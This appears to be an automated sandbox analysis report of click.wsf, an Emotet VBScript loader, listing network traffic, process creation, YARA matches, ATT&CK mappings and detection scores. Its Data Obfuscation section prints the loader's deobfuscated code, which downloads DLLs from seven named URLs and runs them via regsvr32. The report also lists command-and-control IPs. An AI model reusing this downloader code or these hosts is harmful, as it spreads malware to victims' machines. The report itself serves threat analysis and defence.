00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
        Source: wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/0w
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/l
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
        Source: wscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/s
        Source: unknown | HTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1 | Connection: Keep-Alive | Content-Length: 0 | Host: 164.90.222.65
        Source: unknown | DNS traffic detected: queries for: penshorn.org
        Source: global traffic | HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: penshorn.org
        Source: global traffic | HTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: bbvoyage.com
        Source: global traffic | HTTP traffic detected: GET /logs/pd/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: www.gomespontes.com.br
        Source: unknown | HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2

        E-Banking Fraud

        Source: Yara match | File source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
        Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\BlUwZJEPejvMeG\Jump to behavior
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,
        Source: click.wsf | Initial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
        Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\rad75349.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
        Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback
        Source: classification engine | Classification label: mal100.troj.evad.winWSF@5/8@3/54
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,
        Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Window Recorder | Window detected: More than 3 window changes detected

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.scriptfullname)set request=createobject("winhttp.winhttprequest.5.1")set file=wscript.createobject("shell.application")set strout=createobject("adodb.stream")useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""pat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"set triplett=createobject("wscript.shell")url1 = "https://penshorn.org/admin/Ses8712iGR8du/"url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"url3 = "https://www.gomespontes.com.br/logs/pd/"url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"url5 = "http://ozmeydan.com/cekici/9/"url6 = "http://softwareulike.com/cWIYxWMPkK/"url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"docall dowloop while urlcount<8public function dow()on error resume nextselect case urlcountcase 1downstr=url1case 2downstr=url2case 3downstr=url3case 4downstr=url4case 5downstr=url5case 6downstr=url6case 7downstr=url7end selectrequest.open "get",downstr,falserequest.sendIf Err.Number<>0 thenurlcount=urlcount+1elsestrout.openstrout.type=1if vare=0 thencad=1elsefar=2end ifstrout.write (request.responsebody)if roum=0 thensio=sio+1elseend ifstrout.savetofile pat3strout.closearmour = "samcom."set fsobject=createobject("scripting.filesystemobject")Set f = fsobject.GetFile(pat3)GetFileSize = clng(f.size/1024)If GetFileSize > 150 Thencall roizeurlcount = 8elsepat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"urlcount=urlcount+1end ifend ifend functionpublic function roizeif derti=0 thensem=sem+1elseend ifurlcount = 8triplett.run (loiu),0,truecor = "samo"set fsobject=createobject("scripting.filesystemobject")set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")textstream.write ("badum tss")if rotate = 12 thensable = 54 + 22elserouttt = "carry"end ifend 
functionIHost.ScriptFullName();IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\click.wsf");IHost.CreateObject("shell.application");IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://penshorn.org/admin/Ses8712iGR8du/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00000000");_Stream.SaveToFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://www.gomespontes.com.br/logs/pd/", "false");IWinHttp
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180005C69 push rdi; ret
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800056DD push rdi; ret
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A0FC push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_007480D7 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00736CDE push esi; iretd
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00736C9F pushad ; ret
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00739D51 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00748157 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D4E push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D3C push ebp; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D25 push 4D8BFFFFh; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A1D2 push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747987 push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A26E push ebp; ret
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747EAF push 458BCC5Ah; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00739E8B push eax; retf
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0074C731 push esi; iretd
        Source: rad75349.tmp.dll.1.dr | Static PE information: section name: _RDATA
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll:Zone.Identifier read attributes | delete
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe TID: 6476 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 6560 | Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe | API coverage: 8.5 %
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180008D28 FindFirstFileExW,
        Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
        Source: wscript.exe, 00000001.00000003.1534710579.000002D846515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542609320.000002D846518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540392196.000002D846515000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW10p9pF
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW&
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW+
        Source: wscript.exe, 00000001.00000003.1546482854.000002D8467A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000000018000A878 GetProcessHeap,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\wscript.exe | File created: rad75349.tmp.dll.1.dr
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exe | Domain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exe | Domain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exe | Domain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 163.44.196.120 8080
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800070A0 cpuid
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: 12 Scripting; 1 Exploitation for Client Execution; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
        Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
        Defense Evasion: 21 Masquerading; 1 Virtualization/Sandbox Evasion; 111 Process Injection; 12 Scripting; 1 Hidden Files and Directories; 2 Obfuscated Files or Information; 1 Regsvr32; 1 DLL Side-Loading
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: 1 System Time Discovery; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 24 System Information Discovery; Network Service Scanning
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
        Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
        Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
        Behavior Graph ID: 830321 | Sample: click.wsf | Start date: 20/03/2023 | Architecture: WINDOWS | Score: 100
        Sample-level network: 129.232.188.93 xneeloZA South Africa; 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil; 37 other IPs or domains
        Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 4 other signatures
        wscript.exe (started)
            network: gomespontes.com.br 186.202.153.5, 443, 49729 LocawebServicosdeInternetSABR Brazil; penshorn.org 203.26.41.131, 443, 49727 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia; 2 other IPs or domains
            dropped: C:\Users\user\Desktop\rad75349.tmp.dll (PE32+); C:\Users\user\Desktop\rad1F9A4.tmp.dll (HTML); C:\Users\user\Desktop\click.wsf (ASCII)
            signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions
            regsvr32.exe (started by wscript.exe)
                dropped: C:\Windows\System32\...\xhwdmo.dll (copy) (PE32+)
                signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                regsvr32.exe (started by regsvr32.exe)
                    network: 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan; 91.121.146.47, 49731, 8080 OVHFR France; 7 other IPs or domains
                    signatures: System process connects to network (likely due to code injection or exploit)
        OUTLOOK.EXE (started)
            network: 52.109.13.63, 443, 49720 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 52.109.76.141, 443, 49717 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 192.229.221.95, 49707, 49716, 49724 EDGECASTUS United States

        No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\rad75349.tmp.dll | 79% | ReversingLabs | Win64.Trojan.Emotet |
C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy) | 79% | ReversingLabs | Win64.Trojan.Emotet |
Source | Detection | Scanner | Label | Link
3.2.regsvr32.exe.460000.0.unpack | 100% | Avira | HEUR/AGEN.1215476 |
Source | Detection | Scanner | Label | Link
bbvoyage.com | 9% | Virustotal | | Browse
gomespontes.com.br | 2% | Virustotal | | Browse
penshorn.org | 14% | Virustotal | | Browse
www.gomespontes.com.br | 5% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://softwareulike.com/cWIYxWMPkK/ | 100% | Avira URL Cloud | malware |
http://wrappixels.co | 0% | Avira URL Cloud | safe |
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0 | 100% | Avira URL Cloud | malware |
